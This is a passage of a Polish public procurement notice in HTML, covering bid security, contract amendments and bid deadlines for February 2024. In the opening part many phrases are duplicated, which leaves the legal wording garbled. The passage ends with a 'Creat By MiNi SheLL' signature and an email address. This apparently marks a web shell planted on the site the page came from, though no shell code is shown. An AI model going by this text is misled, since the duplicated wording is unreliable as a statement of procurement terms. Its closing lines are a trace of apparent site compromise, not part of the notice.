określonych w ciach określonych w ustawie Pzp oraz powinien posiadać ważność do kolejnego dnia roboczego po terminie ustawie Pzp oraz powinien posiadać ważność do kolejnego dnia roboczego po terminie związania ofertą. związania ofertą.<br/>UWAGA! Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne<br/>UWAGA! Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 określonych w art. 98 ust. 6 Ustawy. Ustawy.<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie zostanie odrzucona.<br/>9. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa na poczet zabezpieczenia należytego wykonania umowy określa Ustawa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy oraz warunków ich wprowadzenia został opisany w par. 14 Projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami i oświadczeniami, zgodnie z art. 283 Pzp, należy złożyć Zamawiającemu za pośrednictwem portalu e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-23 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com